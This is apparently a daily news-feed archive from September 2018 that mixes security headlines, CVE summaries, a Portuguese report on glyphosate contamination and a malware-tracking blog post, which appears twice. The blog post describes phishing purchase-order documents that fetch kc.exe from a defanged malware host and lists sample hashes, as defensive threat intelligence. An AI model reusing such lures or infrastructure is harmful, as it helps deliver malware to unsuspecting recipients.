Daily Archives: September 16, 2018

How to gain visibility with global IT asset inventory

In this podcast recorded at Black Hat USA 2018, Pablo Quiroga, Director of Product Management at Qualys, talks about how to gain unprecedented visibility with global IT asset inventory. Here’s a transcript of the podcast for your convenience. My name is Pablo Quiroga. I’m the Director of Product Management at Qualys, and today I’m going to be speaking about how to gain unprecedented visibility with global IT asset inventory. A complete visibility of your IT … More

The post How to gain visibility with global IT asset inventory appeared first on Help Net Security.

Data privacy automation: Unlock your most valuable asset

In years past, data privacy was the purview of the chief privacy officer. However, increasingly, CTOs are being tasked with operationalizing a data privacy solution for the company. That’s because data privacy is fundamentally a data issue, with privacy being an outcome of a comprehensive data protection strategy. In a world of exploding data, it’s impossible for privacy professionals using manual, survey-based approaches to stay on top of this ever-changing sea of information. Companies constantly … More

The post Data privacy automation: Unlock your most valuable asset appeared first on Help Net Security.

A cidade em que o agrotóxico glifosato contamina o leite materno e mata até quem ainda nem nasceu

O filho de Maria Félix, de 21 anos, resistiu pouco mais de seis meses de gestação. Morreu ainda no ventre, com apenas 322 gramas. A causa do aborto, que aconteceu com 25 semanas de gravidez, foi má formação: o bebê tinha o intestino para fora do abdômen e também problemas no coração. Não é incomum que as mães da região percam seus filhos precocemente. O bebê de Maria, ao que tudo indica, foi mais uma vítima precoce do agrotóxico glifosato, usado em grandes plantações de soja e de milho em Uruçuí, a 459 km de Teresina, no Piauí.

O mesmo veneno que garante a riqueza dos fazendeiros da cidade, no sul do estado, está provocando uma epidemia de intoxicação com reflexo severo em mães e bebês. Estima-se que uma em cada quatro grávidas da cidade tenha sofrido aborto, que 14% dos bebês nasçam com baixo peso (quase do dobro da média nacional) e que 83% das mães tenham o leite materno contaminado. Os dados são de um levantamento do sanitarista Inácio Pereira Lima, que investigou as intoxicações em Uruçuí na sua tese de mestrado em saúde da mulher pela Universidade Federal do Piauí.

Conheci a história de Maria Félix Costa Guimarães na maternidade do hospital regional Tibério Nunes, na cidade de Floriano. É para lá que as mulheres de Uruçuí são encaminhadas quando têm problemas na gravidez. Nos primeiros exames, feitos em julho, já havia sido identificada a má-formação no feto. Em setembro, no leito do hospital, encontrei a jovem, que lia a Bíblia e se recusava a comer. Carregava um olhar entristecido, meio envergonhado. Ela tinha sofrido o aborto no dia anterior e aguardava o médico para fazer uma ultrassom e se certificar de que não seria necessária a curetagem (cirurgia para retirada de restos da placenta).

Laudo do ultrassom que constatou a morte do bebê. ‘A principal consequência é a atrofia de alguns órgãos’, diz o médico.

Reprodução


Maria não tinha condições emocionais para conversar, por isso falei com a sua tia, a funcionária pública Graça Barros Guimarães. Ela não sabia sobre a pesquisa realizada em Uruçuí, mas acredita nos resultados apontados por Lima. “Se a gente for avaliar, o agrotóxico causa problema respiratório e de alergia. Então é claro que se a mulher tiver grávida, o bebê pode se contaminar também”.

Graça me contou que a sobrinha sempre esteve rodeada de fazendas de soja. A casa onde vive, em Uruçuí, fica a cerca de 15 km de uma plantação. Antes, ela morava na zona rural do município de Mirador, no Maranhão, onde também há plantio de soja. “Os fazendeiros tomaram conta de tudo.”

Em meados de agosto estive em Uruçuí para conversar com profissionais da saúde e com os trabalhadores agrícolas. Eu queria entender como viviam as pessoas no município contaminado pelo glifosato, e se elas tinham noção de que o problema existe. Também liguei para o pesquisador Inácio Pereira Lima, que culpa o agronegócio pelo adoecimento das pessoas. “Tudo isso é consequência do modelo de desenvolvimento econômico em que só o lucro está em foco, independente das consequências negativas para a população”, ele me disse.

Epidemia de glifosato

O glifosato é o agrotóxico mais usado no Brasil. É vendido principalmente pela Monsanto, da Bayer, com o nome comercial de Roundup. Seus impactos na saúde humana são tão conhecidos que o Ministério Público pediu que sua comercialização fosse suspensa no Brasil até que a Anvisa fizesse sua reavaliação toxicológica. Em agosto, a justiça aceitou e o glifosfato foi proibido. A suspensão foi classificada como um “desastre” pelo ministro da Agricultura, Blairo Maggi, e foi duramente combatida por ruralistas e pela indústria.

A decisão, no entanto, foi derrubada pela justiça em segunda instância poucas semanas depois. Maggi – que também é conhecido como “rei da soja” – não escondeu o seu entusiasmo com a liberação do agrotóxico:

A Monsanto diz que o produto é seguro, mas e-mails da empresa divulgados no ano passado mostram que ela pressionou cientistas e órgãos de controle nos EUA para afirmarem que o glifosato não causa câncer. Isso não impediu a Monsanto de ser condenada a pagar mais de R$ 1 bilhão a um homem que está morrendo de câncer nos Estados Unidos. Cerca de 4 mil ações parecidas estão em curso naquele país.

O produto representa quase a metade de todos os agrotóxicos comercializados no Piauí. O pesquisador Lima explicou que a presença da substância no leite materno indica a contaminação direta ou que as quantidades utilizadas na atividade agrícola da região são tão elevadas, que o excesso não foi degradado pelo metabolismo da planta. As mulheres estudadas por ele sequer trabalham nas lavouras: elas estão intoxicadas porque fazem limpeza, cozinham nas fazendas ou porque comeram o herbicida nos alimentos. Lima, em sua tese, explica que o organismo é contaminado pela pele e vias respiratória e oral.

Mulheres, as maiores vítimas

Pelos registros do hospital regional de Uruçuí, os abortos ocorrem geralmente em mulheres entre 20 e 30 anos, que chegam até a 10ª semana de gestação. O número elevado de casos é citado por Iraídes Maria Saraiva, enfermeira plantonista. “São muitas as mulheres que chegam com sangramento ou já com o ultrassom mostrando que o feto não tem batimentos cardíacos. A maioria desses abortos são espontâneos”, me disse.

Muitas mulheres têm a gravidez interrompida logo nas primeiras semanas. Sem saber que estão grávidas, elas seguem trabalhando cercadas pelo glifosato. Quando descobrem, já não há mais o que fazer. “Dificilmente é a primeira gravidez e elas não têm doenças pré-existentes. Quer dizer, são mulheres jovens que aparentam ser saudáveis”, observou a enfermeira.

‘É uma contaminação lenta, gradual e diária.’

Há ainda as que sabem que estão esperando um filho mas não podem deixar o trabalho, simplesmente porque dependem do salário. As que passam da fase mais crítica e levam a gravidez até o fim correm alto risco de ter má formação do feto.

Na maternidade de Floriano, o coordenador do setor de obstetrícia Luiz Rosendo Alves da Silva já viu muitos casos de aborto e de má-formação. Ele acredita na culpa dos agrotóxicos. “É uma contaminação lenta, gradual e diária. A principal consequência é a atrofia de alguns órgãos, principalmente coração e pulmão”.

Alanne Pinheiro, enfermeira do Centro de Referência em Saúde do Trabalhador (Cerest), observa que as mulheres estão expostas aos agrotóxicos de forma mais perigosa do que os homens que trabalham diretamente na aplicação do veneno. “Elas ficam na cozinha ou fazem a limpeza das fazendas e acabam inalando o agrotóxico de forma indireta. Como não usam roupas especiais, sofrem mais o efeito da intoxicação passiva.”

PIB alto, salário baixo

A cidade de 21 mil habitantes tem as características comuns do interior, onde a vida acontece sossegada e todo mundo se conhece. Quase um terço da população vive na zona rural. No percurso de 40 km do centro até o Assentamento Flores – onde moram muitos dos trabalhadores com quem eu pretendia conversar – quase não há árvores, exceto em pontos isolados ao redor da casa grande, a sede da fazenda. A sensação é de um enorme deserto e uma riqueza distribuída entre poucos.

Na pacata Uruçuí, mesmo quem não trabalha diretamente na agricultura está sendo contaminado.

Foto: Divulgação/Prefeitura Municipal de Uruçuí

Uruçuí não é um município pobre. O PIB per capita, de R$ 49 mil, era o 2º maior do Piauí em 2015, último ano da pesquisa do IBGE. Perdia apenas para a cidade vizinha, a também agrícola Baixa Grande do Ribeiro. Mas na prática, o salário dos trabalhadores é de R$ 1.900 por mês, em média.

Quem enriquece de verdade são os fazendeiros. A maioria deles saiu do sul do Brasil para o cerrado piauiense em busca de terras e do clima ideal para o plantio de suas lavouras. Outros ocupam ou já ocuparam cargos na política como deputados ou vereadores. É o caso do ex-deputado estadual Leal Júnior, eleito três vezes para o mesmo cargo, e da vereadora de Uruçuí Tânia Fianco.

‘Não fale com eles’

Joana* trabalhou como cozinheira na Fazenda Serra Branca há sete anos. Ela conta que o cheiro do agrotóxico chega até as trabalhadoras, mesmo quando elas não estão nos locais onde o veneno é aplicado. “Dependendo da posição do vento, a gente sentia. E se tivesse aplicando com o avião, era mais forte. Às vezes eu chegava em casa com dor de cabeça e sabia que era do veneno”, lembra ela, que prefere não se identificar. “Sabe como é, né? A gente depende das fazendas”, conforma-se. O marido ainda trabalha no agronegócio.

Se os males causados pelos agrotóxicos se limitassem às mães e aos seus bebês, o problema já seria grave o bastante, mas o sanitarista Inácio Pereira Lima faz um alerta. “Como minha pesquisa foi voltada para a mulher, coletei amostras biológicas exclusivas; por isso foi o leite. Mas, se a pesquisa fosse da população em geral, poderia optar por outro tipo de amostra como sangue ou urina. E talvez chegasse a esses mesmos resultados. Ou seja, toda a população está sob risco, e não só as mães que amamentam”, me explicou o pesquisador.

Efeitos do agrotóxico são tabu na cidade.

Ouvi de muitas pessoas da cidade que alguns fazendeiros não são simpáticos com quem os contraria. O conselho que todo mundo me deu foi: “Não fale com eles”. As fazendas têm seguranças armados.

Decidi ir ao escritório da Fazenda Canel, administrada pelas famílias Bortolozzo e Segnini, originárias de Araraquara, no interior de São Paulo. Eles se instalaram no Piauí há 30 anos e são os pioneiros no plantio de soja no estado. Eu queria entender a posição deles. Todos se negaram a conversar comigo. Funcionários justificaram que os responsáveis estavam “viajando para o exterior”.

Mais medo de demissão do que de doença

Na cidade onde quase todo mundo se conhece, o mesmo segredo é compartilhado. Ninguém fala para os profissionais de saúde quando sente os efeitos do agrotóxico no organismo, e dificilmente o hospital é procurado. Se a intoxicação for mais grave, os trabalhadores escondem dos médicos sua possível causa. É muito difícil detectar laboratorialmente doenças causadas por agrotóxico. Se o paciente não fala, muitas internações provocadas pelos químicos não caem na conta deles.

A enfermeira Alanne Pinheiro me disse que as pessoas têm medo de perder o emprego. “Se eles disserem que estão doentes por causa dos agrotóxicos, aquilo pode repercutir na cidade e ficar mal pro fazendeiro. Os trabalhadores têm mais medo de demissão do que de uma doença.”

‘Quando a gente começa a investigar, eles não falam tudo.’

Há ainda a falta de conhecimento sobre os riscos dos agrotóxicos. “Eles nem acreditam que possa acontecer algum problema grave porque os danos só aparecem a longo prazo. Não existe a percepção de que os males se acumulam e podem trazer doenças irreversíveis, como um câncer que já se descobre em metástase”, diz Alanne.

Um possível exemplo é João*, marido de Helena*. Conversei com ela porque João sai cedo para a Fazenda Nova Aliança e só chega à noite. Este ano, o trabalhador teve uma alergia nos braços, mas decidiu tratar em casa. Sem avaliação médica e sem exames, João se auto-medicou. “Acho que não foi agrotóxico, porque ele é pedreiro e não mexe com veneno. Deve ter sido por causa do cimento”, opina a mulher.

É comum que os moradores atribuam os sintomas da intoxicação a outras causas. “Os pacientes chegam com queixas vagas, como ardência nos olhos. Mas, quando a gente começa a investigar, eles não falam tudo”, comenta a enfermeira Iraídes. Nas raras vezes em que vão ao hospital, são levados por algum funcionário da fazenda. Com essa vigília, o medo de perder o emprego é maior e a saúde fica em segundo plano.

O Centro de Referência em Saúde do Trabalhador está tentando evitar o alto índice de subnotificação: eles treinam os enfermeiros e médicos para que notifiquem os casos de intoxicação quando perceberem os sintomas, independente do que afirmam os pacientes.

Tecnologia para o lucro

Geivan Borges da Silva é técnico em agropecuária e presta assessoria para muitos fazendeiros de Uruçuí. Ele defende que o uso de sementes transgênicas reduz a necessidade de agrotóxicos. “Quase 100% das áreas plantadas aqui são de variedades transgênicas, resistentes a muitos tipos de praga e ervas daninhas”, ameniza.

Na verdade, as provas científicas dizem o contrário. O dossiê sobre agrotóxicos da Abrasco, a Associação Brasileira de Saúde Coletiva, mostra que o uso de transgênicos aumentou a necessidade de defensivos agrícolas. É só olhar para a soja, campeã no uso de agrotóxicos: 93% da safra é transgênica, e a quantidade de litros de produtos químicos aumentou mesmo assim.

Na região sul do Piauí, as sementes de milho, soja e algodão também são vendidas pela Monsanto, a mesma que fornece o glifosato, de acordo com o cadastro de junho de 2018 da Agência de Defesa Agropecuária do Piauí, a Adapi.

Outra tecnologia defendida por Silva é a que minimiza a disseminação do agrotóxico no ar: usa-se um produto que aumenta o peso da gota, fazendo com que ela desça diretamente na planta e não disperse com o vento. “Tudo é agricultura de precisão para reduzir os custos”, argumenta.

É certo que essas tecnologias otimizam a produção agrícola, mas elas foram incapazes de evitar a intoxicação de Emanuel*, que trabalha como operador de máquina de aplicação de agrotóxico na Fazenda Condomínio União 2000.

Após um ano trabalhando, Emanuel sentiu tontura, fraqueza, ardência nos olhos e chegou a vomitar. Quem conta essa história é a esposa dele, Rosa*. “Nós fomos pro hospital e quando saiu o resultado do exame, deu que tinha agrotóxico no sangue. A médica passou remédio, mandou ele se afastar do trabalho por um tempo e tomar muito leite”.

Emanuel melhorou, mas há três anos voltou para o mesmo ofício. “Ele já me disse que só fica até o final desse ano. Não vale a pena perder a saúde por causa de dois mil por mês”, diz Rosa. Eram 18h quando me despedi. O marido dela ainda não tinha chegado. Ele trabalha para a vereadora Tânia Fianco, do PSDB.

No Brasil, o Projeto de Lei conhecido como PL do Veneno pretende liberar mais rapidamente vários produtos, entre eles muitos que são à base de glifosato. O lobby da indústria é pesado, e ataca sobretudo a Anvisa, agência reguladora suscetível a todo tipo de pressão e que já mostrou que está disposta a fazer o jogo das grandes corporações.

*Os nomes dos trabalhadores foram alterados para preservar suas identidades.

Foto em destaque: ultrassom que constatou a má-formação no filho de Maria Félix. Ele morreu ainda no útero, com 25 semanas, por causa de má-formação no abdômen e no coração.

The post A cidade em que o agrotóxico glifosato contamina o leite materno e mata até quem ainda nem nasceu appeared first on The Intercept.

CVE-2018-17127

blocking_request.cgi on ASUS GT-AC5300 devices through 3.0.0.4.384_32738 allows remote attackers to cause a denial of service (NULL pointer dereference and device crash) via a request that lacks a timestap parameter.

Latest Hacking News Podcast #122

Ransomware hits Bristol Airport, officials warn of Hurricane Florence phishing scams and former Anonymous hacker raises $2.5 million for start-up on today's episode of Latest Hacking News Podcast.

Latest Hacking News Podcast #122 on Latest Hacking News.

Nvidia Researchers Generate Synthetic Brain MRI Images For AI Research

AI holds a great deal of promise for medical professionals who want to get the most out of medical imaging. However, when it comes to studying brain tumors, there's an inherent problem with the data: abnormal brain images are, by definition, uncommon. New research from Nvidia aims to solve that. From a report: A group of researchers from Nvidia, the Mayo Clinic, and the MGH & BWH Center for Clinical Data Science this weekend are presenting a paper on their work using generative adversarial networks (GANs) to create synthetic brain MRI images. GANs are effectively two AI systems that are pitted against each other -- one that creates synthetic results within a category, and one that identifies the fake results. Working against each other, they both improve. GANs could help expand the data sets that doctors and researchers have to work with, especially when it comes to particularly rare brain diseases.

Read more of this story at Slashdot.

The Challenges of Artificial Intelligence (AI) for Organisations

Governments, businesses and societies as a whole benefit enormously from Artificial Intelligence (AI). AI assists organisations in reducing operational costs, boosting user experience, elevating efficiency and cultivating revenue. But it also creates a number of security challenges for personal data and forms many ethical dilemmas for organisations. Such challenges for information security professionals mean re-calibration […]… Read More

The post The Challenges of Artificial Intelligence (AI) for Organisations appeared first on The State of Security.

The State of Security: The Challenges of Artificial Intelligence (AI) for Organisations

Governments, businesses and societies as a whole benefit enormously from Artificial Intelligence (AI). AI assists organisations in reducing operational costs, boosting user experience, elevating efficiency and cultivating revenue. But it also creates a number of security challenges for personal data and forms many ethical dilemmas for organisations. Such challenges for information security professionals mean re-calibration […]… Read More

The post The Challenges of Artificial Intelligence (AI) for Organisations appeared first on The State of Security.



The State of Security

What Is the Most Important Skill Cyber Security Professionals Can Possess? The Experts Weigh In

The cyber security field is booming, with demand for cyber security professionals far outpacing supply. This talent shortage has created an industry where pay is high and the options for job seekers are plentiful. Yet there is also a shortage of cyber talent caused by a confluence of factors, including employers demanding too many required […]… Read More

The post What Is the Most Important Skill Cyber Security Professionals Can Possess? The Experts Weigh In appeared first on The State of Security.

The State of Security: What Is the Most Important Skill Cyber Security Professionals Can Possess? The Experts Weigh In

The cyber security field is booming, with demand for cyber security professionals far outpacing supply. This talent shortage has created an industry where pay is high and the options for job seekers are plentiful. Yet there is also a shortage of cyber talent caused by a confluence of factors, including employers demanding too many required […]… Read More

The post What Is the Most Important Skill Cyber Security Professionals Can Possess? The Experts Weigh In appeared first on The State of Security.



The State of Security

CFP October 10, 2018, The International Symposium on Cyber Warfare, Cyber Defense, & Cyber Security (CSCI-ISCW)

theinternetofthings.eu - Cyber Warfare adds an additional dimension to warfare. Generally, it involves the battlespace use and targeting of computers and networks in warfare. Cyber Warfare strategies include both offensive a…


Tweeted by @IoTGazette https://twitter.com/IoTGazette/status/1041514779972579328

“…But I’m a CIP Cyborg Warrior with Real Kung Fu Grip… Then Prove It!”

  This blog is written by Jason Christopher, SANS ICS456 instructor. Ok, sure, that's an exaggeration on the existing CIP Ninja[1] nomenclature so many of us use, but you get the point. Sometimes it's hard to make CIP exciting. Depending on your responsibilities, you may face death-by-patching updates or log reviews. You may be trapped … Continue reading ...But I'm a CIP Cyborg Warrior with Real Kung Fu Grip... Then Prove It!

CyberCrime & Doing Time: Dangerous Invoices and Dangerous Infrastructure

One of the things I've learned in twenty-nine years investigating malware is that MOST bad guys are lazy and cheap.  One of the main ways that shows up is in the reuse of infrastructure.  Or as one of my criminology friends says it "most criminals are caught by identifying patterns of habit and convenience."  That's why it can sometimes be useful to examine a malware sample, even if it fails to trigger due to age.  It is likely that OTHER samples are using the same infrastructure or deployment system.

My friends at Cofense published their finding last week that Microsoft Office macros are still the number one way that malware is being delivered via email, accounting for 45% of all malware delivery mechanisms they have recently studied.  Anyone with a spam collection can quickly reach that same conclusion.  A couple such campaigns even showed up in my personal email this week.

Here's three emails from consecutive days last week sent to one of my personal email domains:

A Purchase Order from "ADNOC" (Sep 6, 2018)

A Purchase Order from H&H Nails (Sep 5, 2018)

A Purchase Order from SS Braid (Sep 4, 2018)
The most convincing phish, as PhishMe and later Cofense have repeatedly demonstrated by studying what millions of customers actually click on, are those which imitate a common business practice, such as these Purchase Orders. In an attempt to be helpful, many will open a Purchase Order received in email, even if they don't recognize the company name, often as a means of directing the PO to the appropriate department.  Big Mistake!

Working from oldest to newest: 

SS BRAID PO.doc was recognized as being malicious by 33 of 59 AV vendors at VirusTotal - a helpful analysis from VMRay, linked in the comments section tells us that the sample attempts to download "kc.exe" from the site rollboat[.]tk.
MD5
02b6f049f4d8246ee982d8c34a160311
sale contract.doc was recognized as being malicious by 29 of 59 AV vendors at VirusTotal - and in this case, Dr.Web shared their analysis with VirusTotal, also revealing that the action of open the document would launch the same "kc.exe" file from rollboat, as the other file.
MD5
736de7cd6a9c76bd7df49e6b3df6000e
SHA-1
1315994222d45410c8508cf614378e35c4f56c94


As it turns out, in the three consecutive daily email blasts identified above, each sample had two email attachments, and they were all the same attachments only with different names.
The three 386KB files all had the same hashes, and the three 176KB files also all had the same hashes.  So, for at least September 4, 5, and 6, 2018, kc.exe was the target that the malicious actor wanted us to launch on our computer.  The file is no longer available, which could stall the investigation, but let's look at Habit and Convenience.  If the actor is already hosting on rollboat[.]tk, is it not likely he'll keep doing so until someone prevents him?

Each of the subdirectories contained additional malicious files.  By the directory time stamps, its clear that this criminal continued delivering his malware that began on Sep 4, Sep 5, Sep 6, at least through Sep 14th (Friday).  Since everyone needs a weekend, and business-process-imitating malware is most profitable on weekdays, the criminals haven't uploaded any new malware on Saturday September 15th, or Sunday September 16th.  

The leftover cnn.exe file from September 6th is well-detected (32 of 67 at VirusTotal) although Microsoft, Symantec, and TrendMicro all report the executable as "clean."  The more recent ogox.exe file from September 14th has a slightly poorer 1 in 3 detection (20 of 67 at VirusTotal), as is typical for Friday malware only 60 hours later.  (The various AV engines will all tell you that's because blah blah blah.  I'm running their code. I just infected myself with their AV running. Whatever.) 

Invoice.exe = (14 of 67 on VirusTotal)  - (checks smtp.gmail.com and then self-terminates)
MD5
1261b8382cfa2b905f0f52a3aef49ce4
SHA-1
e80c07f700cf817a1eca1f8186f820492f8a2fbc
Order.exe = (34 of 68 on VirusTotal
MD5
57b430ea422d1f33fef19f02fb85c7f0
SHA-1
60a64400207fd9835899189aa0c3cbca027fe8cf

MD5
0fa8876252c632b64afad8fd7fa6344f
SHA-1
ab372d169743758bb81abaa4bc303d5303f6d913

MD5
f321b38b171a3cbc1eff4a41ac5bbe47
SHA-1
da61f88e2e95a23e58d96cf845c523fd10023cb7

Regardless of what this malware actually does, the two take-aways here?  Malware continues to spread by imitating common business practices, such as processing Invoices and Purchase Orders.  And Criminals continue to rely on Habit and Convenience, which means they are still able to be tracked by looking at their infrastructure choices.










CyberCrime & Doing Time

Dangerous Invoices and Dangerous Infrastructure

One of the things I've learned in twenty-nine years investigating malware is that MOST bad guys are lazy and cheap.  One of the main ways that shows up is in the reuse of infrastructure.  Or as one of my criminology friends says it "most criminals are caught by identifying patterns of habit and convenience."  That's why it can sometimes be useful to examine a malware sample, even if it fails to trigger due to age.  It is likely that OTHER samples are using the same infrastructure or deployment system.

My friends at Cofense published their finding last week that Microsoft Office macros are still the number one way that malware is being delivered via email, accounting for 45% of all malware delivery mechanisms they have recently studied.  Anyone with a spam collection can quickly reach that same conclusion.  A couple such campaigns even showed up in my personal email this week.

Here's three emails from consecutive days last week sent to one of my personal email domains:

A Purchase Order from "ADNOC" (Sep 6, 2018)

A Purchase Order from H&H Nails (Sep 5, 2018)

A Purchase Order from SS Braid (Sep 4, 2018)
The most convincing phish, as PhishMe and later Cofense have repeatedly demonstrated by studying what millions of customers actually click on, are those which imitate a common business practice, such as these Purchase Orders. In an attempt to be helpful, many will open a Purchase Order received in email, even if they don't recognize the company name, often as a means of directing the PO to the appropriate department.  Big Mistake!

Working from oldest to newest: 

SS BRAID PO.doc was recognized as being malicious by 33 of 59 AV vendors at VirusTotal - a helpful analysis from VMRay, linked in the comments section tells us that the sample attempts to download "kc.exe" from the site rollboat[.]tk.
MD5
02b6f049f4d8246ee982d8c34a160311
sale contract.doc was recognized as being malicious by 29 of 59 AV vendors at VirusTotal - and in this case, Dr.Web shared their analysis with VirusTotal, also revealing that the action of open the document would launch the same "kc.exe" file from rollboat, as the other file.
MD5
736de7cd6a9c76bd7df49e6b3df6000e
SHA-1
1315994222d45410c8508cf614378e35c4f56c94


As it turns out, in the three consecutive daily email blasts identified above, each sample had two email attachments, and they were all the same attachments only with different names.
The three 386KB files all had the same hashes, and the three 176KB files also all had the same hashes.  So, for at least September 4, 5, and 6, 2018, kc.exe was the target that the malicious actor wanted us to launch on our computer.  The file is no longer available, which could stall the investigation, but let's look at Habit and Convenience.  If the actor is already hosting on rollboat[.]tk, is it not likely he'll keep doing so until someone prevents him?

Each of the subdirectories contained additional malicious files.  By the directory time stamps, its clear that this criminal continued delivering his malware that began on Sep 4, Sep 5, Sep 6, at least through Sep 14th (Friday).  Since everyone needs a weekend, and business-process-imitating malware is most profitable on weekdays, the criminals haven't uploaded any new malware on Saturday September 15th, or Sunday September 16th.  

The leftover cnn.exe file from September 6th is well-detected (32 of 67 at VirusTotal) although Microsoft, Symantec, and TrendMicro all report the executable as "clean."  The more recent ogox.exe file from September 14th has a slightly poorer 1 in 3 detection (20 of 67 at VirusTotal), as is typical for Friday malware only 60 hours later.  (The various AV engines will all tell you that's because blah blah blah.  I'm running their code. I just infected myself with their AV running. Whatever.) 

Invoice.exe = (14 of 67 on VirusTotal)  - (checks smtp.gmail.com and then self-terminates)
MD5
1261b8382cfa2b905f0f52a3aef49ce4
SHA-1
e80c07f700cf817a1eca1f8186f820492f8a2fbc
Order.exe = (34 of 68 on VirusTotal
MD5
57b430ea422d1f33fef19f02fb85c7f0
SHA-1
60a64400207fd9835899189aa0c3cbca027fe8cf

MD5
0fa8876252c632b64afad8fd7fa6344f
SHA-1
ab372d169743758bb81abaa4bc303d5303f6d913

MD5
f321b38b171a3cbc1eff4a41ac5bbe47
SHA-1
da61f88e2e95a23e58d96cf845c523fd10023cb7

Regardless of what this malware actually does, the two take-aways here?  Malware continues to spread by imitating common business practices, such as processing Invoices and Purchase Orders.  And Criminals continue to rely on Habit and Convenience, which means they are still able to be tracked by looking at their infrastructure choices.

Update

Monday morning, back to work!  Sure enough, we checked the rollboat directory for fresh files this morning:

VirusTotal 19 of 65
MD5
793a3a5e434add85d24df212bf3a72d0
SHA-1
cedcb4b74baf0ba7b39aeea1983bd2f48586e9a4



MD5
d13f100887011e3110b224779c11594b
SHA-1
22971ed9a43f7f8e9b8b55de9d28406bb83cffb1



VirusTotal 20 of 67 
MD5
de1a7961917537084aa383fd398beac5
SHA-1
a52e447bfe24760c31142f9a3b0efc90cd7c2366

I'll also note that this morning on my Windows 10 machine running current Chrome, the file downloads were prevented - marked "This file is dangerous, so Chrome has blocked it."  When I told Chrome to let me download one any way, Windows Defender stopped it.  Sharing information DOES help!







Linus Torvalds Reflects On How He’s Been Hostile To Linux Community Members Over the Years, Issues Apology, and Announces He Will Be Taking Some Time Off

On Sunday, Linus Torvalds spoke about the confusion he had regarding Maintainer's Summit, but more importantly, how this incident gave him a chance to realize "that I really had been ignoring some fairly deep-seated feelings in the community." In an email to the Linux Kernel Mailing List, Torvalds apologized for hurting people with his behavior over the years, and possibly driving some people "away from kernel development entirely." On that end, said Torvalds, "I am going to take time off and get some assistance on how to understand people's emotions and respond appropriately." He wrote: [...] It's one thing when you can ignore these issues. Usually it's just something I didn't want to deal with. This is my reality. I am not an emotionally empathetic kind of person and that probably doesn't come as a big surprise to anybody. Least of all me. The fact that I then misread people and don't realize (for years) how badly I've judged a situation and contributed to an unprofessional environment is not good. This week people in our community confronted me about my lifetime of not understanding emotions. My flippant attacks in emails have been both unprofessional and uncalled for. Especially at times when I made it personal. In my quest for a better patch, this made sense to me. I know now this was not OK and I am truly sorry. The above is basically a long-winded way to get to the somewhat painful personal admission that hey, I need to change some of my behavior, and I want to apologize to the people that my personal behavior hurt and possibly drove away from kernel development entirely.I am going to take time off and get some assistance on how to understand people's emotions and respond appropriately. Put another way: When asked at conferences, I occasionally talk about how the pain-points in kernel development have generally not been about the _technical_ issues, but about the inflection points where development flow and behavior changed. These pain points have been about managing the flow of patches, and often been associated with big tooling changes - moving from making releases with "patches and tar-balls" (and the _very_ painful discussions about how "Linus doesn't scale" back 15+ years ago) to using BitKeeper, and then to having to write git in order to get past the point of that no longer working for us. We haven't had that kind of pain-point in about a decade. But this week felt like that kind of pain point to me. To tie this all back to the actual 4.19-rc4 release (no, really, this_is_ related!) I actually think that 4.19 is looking fairly good, things have gotten to the "calm" period of the release cycle, and I've talked to Greg to ask him if he'd mind finishing up 4.19 for me, so that I can take a break, and try to at least fix my own behavior. This is not some kind of "I'm burnt out, I need to just go away" break. I'm not feeling like I don't want to continue maintaining Linux. Quite the reverse. I very much *do* want to continue to do this project that I've been working on for almost three decades. This is more like the time I got out of kernel development for a while because I needed to write a little tool called "git". I need to take a break to get help on how to behave differently and fix some issues in my tooling and workflow. And yes, some of it might be "just" tooling. Maybe I can get an email filter in place so at when I send email with curse-words, they just won't go out. Because hey, I'm a big believer in tools, and at least _some_ problems going forward might be improved with simple automation. [...]

Read more of this story at Slashdot.

CVE-2018-17108

The SBIbuddy (aka com.sbi.erupee) application 1.41 and 1.42 for Android might allow attackers to perform Account Takeover attacks by intercepting a security-question response during the initial configuration of the application.

Pelosi’s Counter-Intelligence

dailycaller.com - No one has been more active in the Democrats’ war against our intelligence community than House Speaker Nancy Pelosi. Last May, HUMAN EVENTS reported first on the CIA memorandum that showed that Pelo…


Tweeted by @mdiamond241 https://twitter.com/mdiamond241/status/1041465771694731264

Vulnerability in WebKit Crashes and Restarts iPhones and iPads

Catalin Cimpanu, writing for ZDNet: A security researcher has discovered a vulnerability in the WebKit rendering engine used by Safari that crashes and restarts the iOS devices -- iPhones and iPads. The vulnerability can be exploited by loading an HTML page that uses specially crafted CSS code. The CSS code isn't very complex and tries to apply a CSS effect known as backdrop-filter to a series of nested page segments (DIVs). Backdrop-filter is a relative new CSS property and works by blurring or color shifting to the area behind an element. This is a heavy processing task, and some software engineers and web developers have speculated that the rendering of this effect takes a toll on iOS' graphics processing library, eventually leading to a crash of the mobile OS altogether.

Read more of this story at Slashdot.

Global Cyber Warfare Market Opportunities, Top Trends, Drivers, Challenge, Analysis by Regions, Research Methodology and Forecast to 2018- 2025 – Market Research Day

marketresearchday.com - The Global Cyber Warfare Market report provides deep analysis of market.It define,describe and forecast the market by product type and key regions. it covers profile of the key players and compreh…


Tweeted by @CSFI_DCOE https://twitter.com/CSFI_DCOE/status/1041456011553513474

Fans Are Spoofing Spotify With ‘Fake Plays’, And That’s A Problem For Music Charts

An anonymous reader shares a report: The Billboard charts have long been the gold standard by which musicians measure their success, but as recent tantrums by the likes of Nicki Minaj have highlighted, the rising influence of streaming services is upending that model -- and giving die-hard fans a way to manipulate the data. A recent release by the Korean pop group BTS prompted its superfandom, millions strong across the globe, to do just that by launching a sophisticated campaign to make sure the boy band reached No. 1. The strategy employed by the so-called BTS Army went largely like this: Fans in the US created accounts on music streaming services to play BTS's music and distributed the account logins to fans in other countries via Twitter, email, or the instant messaging platform Slack. The recipients then streamed BTS's music continuously, often on multiple devices and sometimes with a virtual private network (VPN), which can fake, or "spoof," locations by rerouting a user's traffic through several different servers across the world. Some fans will even organize donation drives so other fans can pay for premium streaming accounts. "Superfans of pop acts have long been doing this sort of thing," said Mark Mulligan, managing director of the digital media analysis company MIDIA Research. "But if a superfan has decided to listen nonstop to a track, is that fake? If so, how many times do they have to listen to a track continuously before it is deemed 'fake'?" One BTS fan group claimed it distributed more than 1,000 Spotify logins, all to make it appear as though more people in the US were streaming BTS's music and nudge their album Love Yourself: Tear up the Spotify chart, which in turn factors into Billboard's metrics.

Read more of this story at Slashdot.

CVE-2018-17103

** DISPUTED ** An issue was discovered in GetSimple CMS v3.3.13. There is a CSRF vulnerability that can change the administrator's password via admin/settings.php. NOTE: The vendor reported that the PoC was sending a value for the nonce parameter.

CVE-2018-17100

An issue was discovered in LibTIFF 4.0.9. There is a int32 overflow in multiply_ms in tools/ppm2tiff.c, which can cause a denial of service (crash) or possibly have unspecified other impact via a crafted image file.

CVE-2018-17098

